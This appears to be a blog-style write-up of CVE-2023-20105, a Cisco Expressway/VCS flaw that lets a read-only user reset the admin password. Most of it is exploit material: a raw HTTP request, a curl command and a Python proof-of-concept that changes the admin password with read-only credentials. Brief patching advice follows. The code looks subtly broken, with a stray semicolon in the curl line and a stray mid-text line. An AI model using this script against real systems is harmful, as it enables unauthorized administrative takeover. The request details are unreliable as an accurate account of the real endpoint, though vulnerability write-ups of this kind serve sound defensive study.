CVE-2023-20105 - How an Authenticated Read-Only User Can Become Admin on Cisco Expressway and VCS

Published: June 2023

TL;DR

CVE-2023-20105 affects Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS). This security issue lets anyone with a simple “read-only” account change the password of any user—*even administrators*—and take over the system. Below, we break down how it works, what you can do, and show with real-world code snippets how this exploit operates.

What Is CVE-2023-20105?

In Cisco’s popular video conferencing hardware, the password change functionality had a flaw. The web interface did not properly verify that a “read-only” user should *not* be allowed to change other users' passwords. That means anyone with low-level access could become a system admin with just a few crafted web requests.

How Does It Work?

The flaw is in the web-based management interface. When a password change request is submitted, the system fails to check if the user is authorized to change the *target* password.

Never change others’ passwords

But, the backend didn’t actually restrict who could send password changes. So, a read-only user could send a request like:

POST /users/changepassword HTTP/1.1
Host: cisco-expressway.local
Authorization: Basic cmVhZG9ubHl1c2VyOnBhc3N3b3Jk
Content-Type: application/json

{
    "username": "admin",
    "password": "newP@sswrd!"
}

If you send this request while authenticated as a *read-only user*, the admin’s password gets changed! Now, log in as “admin” using “newP@sswrd!”—and you have full control.

Capture Normal Requests

- Use a tool like Burp Suite to watch the login and password change requests.

Example with curl

curl -k -u readonlyuser:password \
    -X POST "https://cisco-expressway.local/users/changepassword"; \
    -H "Content-Type: application/json" \
    -d '{"username":"admin","password":"newP@sswrd!"}'

Why Did This Happen?

The root cause is *improper authorization checking*:  
The API accepted password changes from any authenticated user and didn’t check if that user had the permissions needed to perform such action.

Proof of Concept (PoC) Python Script

import requests
from requests.auth import HTTPBasicAuth

url = "https://cisco-expressway.local/users/changepassword";
readonly_user = "readonlyuser"
readonly_pass = "password"
target_user = "admin"
new_password = "NewSecretP@ss2024!"

headers = {'Content-Type': 'application/json'}
data = {
    "username": target_user,
    "password": new_password
}

response = requests.post(
    url, 
    json=data, 
    headers=headers,
    auth=HTTPBasicAuth(readonly_user, readonly_pass),
    verify=False
)

if response.status_code == 200:
    print("[+] Password changed successfully! Log in as admin with new password.")
else:
    print("[-] Exploit failed! Code:", response.status_code)

Cisco’s Official Advisory:

CVE-2023-20105 in Cisco Expressway Series and TelePresence VCS
- NVD Entry

# Fix

Cisco released updates and highly recommends immediate patching.  
There are *no* workarounds; disable access or upgrade.

Patch Now - Download and install the latest software versions from Cisco.

- Network Segmentation - Make sure only trusted users and networks can reach the device management web interface.

Conclusion

CVE-2023-20105 is a serious and easy-to-exploit privilege escalation bug in Cisco Expressway and VCS systems. If you use these devices, patch now. It’s a classic case where assuming “read-only” means “safe”—but poor authorization returns to bite.

Further Reading

- Official Cisco Advisory
- NVD | CVE-2023-20105 Details

Stay safe, secure your video infrastructure, and never underestimate what a simple “read-only” account can do if the code isn’t careful!

Timeline

Published on: 06/28/2023 15:15:00 UTC
Last modified on: 07/12/2023 16:15:00 UTC